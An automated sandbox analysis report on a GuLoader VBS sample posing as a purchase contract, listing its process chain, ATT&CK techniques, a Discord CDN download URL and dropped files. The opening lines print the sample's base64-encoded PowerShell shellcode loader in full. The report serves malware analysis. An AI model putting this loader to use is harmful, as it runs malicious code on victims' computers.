B0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Query Registry    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts321
    Scripting    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Security Software Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Application Layer Protocol    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell    		Logon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information    		NTDS21
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script321
    Scripting    		LSA Secrets1
    Application Window Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information    		Cached Domain Credentials1
    File and Directory Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    DLL Side-Loading    		DCSync12
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 560422 Sample: tregrene-KaufVertraeg-Joach... Startdate: 26/01/2022 Architecture: WINDOWS Score: 84 22 Found malware configuration 2->22 24 Yara detected GuLoader 2->24 26 Potential malicious VBS script found (suspicious strings) 2->26 28 C2 URLs / IPs found in malware configuration 2->28 8 wscript.exe 1 1 2->8         started        process3 signatures4 30 VBScript performs obfuscated calls to suspicious functions 8->30 32 Wscript starts Powershell (via cmd or directly) 8->32 34 Very long command line found 8->34 36 Encrypted powershell cmdline option found 8->36 11 powershell.exe 28 8->11         started        process5 process6 13 csc.exe 3 11->13         started        16 conhost.exe 11->16         started        file7 20 C:\Users\user\AppData\Local\...\ejetful0.dll, PE32 13->20 dropped 18 cvtres.exe 1 13->18         started        process8

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs0%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://cdn.discordapp.com/attachments/933089228261294143/9false
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.876857673.0000000005361000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/powershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000005.00000002.886939928.00000000063C3000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:560422
                Start date:26.01.2022
                Start time:15:00:13
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 9m 46s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:23
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal84.troj.evad.winVBS@8/10@0/0
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 68
                • Number of non-executed functions: 5
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .vbs
                • Override analysis time to 240s for JS files taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:02:04API Interceptor63x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8003
                Entropy (8bit):4.839308921501875
                Encrypted:false
                SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                MD5:937C6E940577634844311E349BD4614D
                SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                C:\Users\user\AppData\Local\Temp\RESA312.tmp

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
                Category:dropped
                Size (bytes):1340
                Entropy (8bit):3.9844957008769284
                Encrypted:false
                SSDEEP:24:H+DK9oVapOwgcKXNcaH2hKcjmfwI+ycuZhNW6akSJLPNnq9ed:ejIpOVcU3MK2mo1ulW6a3Jhq9+
                MD5:FC49CB16555CCB3E9712B61780093A4F
                SHA1:2CCC9817ACFB52EEA331713E6A51EB48A4F87E4C
                SHA-256:B16B44D6970784B72DA775D83FB9F2FD04B42C9FD8F09741F78CD2E54EA9E064
                SHA-512:A0C0B0B751083E80414167F26C252621A611B3B6071D24E6979DA92594B939759B65947DEE1EC97613CEC00840B835101AADD09B7F425D86C02A8B3848142B29
                Malicious:false
                Reputation:low
                Preview:L......a.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP................8N.O..Q.P_....q...........7.......C:\Users\user\AppData\Local\Temp\RESA312.tmp.-.<...................'...Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.j.e.t.f.u.l.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5o4o2mhb.iix.psm1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview:1

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz54gho0.0ha.ps1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.075622557496499
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry46ak7YnqqJLPN5Dlq5J:+RI+ycuZhNW6akSJLPNnqX
                MD5:384EEE4FB1D851BF505F99A9B0E57181
                SHA1:A05EB6B97B7CC034189F6C4CFC254170BDC30031
                SHA-256:EEB56A26B02324A42D7658541E8212A66F2E14703828BF69FF5C5ACFC33B209D
                SHA-512:ABADFE65F9EA390F249C8835179DAFE4173FB691BA6014413492A4E3C9E0DAFFE2EBA1F180A787E1E8CE4CE1EAAD0317053EDB1D9D8B2D16A97300DA3BF4609E
                Malicious:false
                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.j.e.t.f.u.l.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.j.e.t.f.u.l.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.0.cs

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                Category:dropped
                Size (bytes):490
                Entropy (8bit):5.177061534453094
                Encrypted:false
                SSDEEP:12:V/DGrJonWvLRCSEYo9FMwQiP2HLlPJV7xRffnLR5:JomnWvLRCSEYk++SHFRffnf
                MD5:6EF217E1B387262CD37C8871BD75207A
                SHA1:D3D9DBD4C81658B7A1F9F0F99EBC4FF4F00C0D26
                SHA-256:38905131EE1E1DDEF2A4BC7CB49F29B1FF449275C3B21BE90AF10F2232052D57
